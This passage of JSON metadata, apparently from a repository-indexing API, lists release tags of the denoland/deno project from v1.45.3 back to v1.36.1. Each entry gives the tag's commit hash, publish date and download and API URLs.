repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.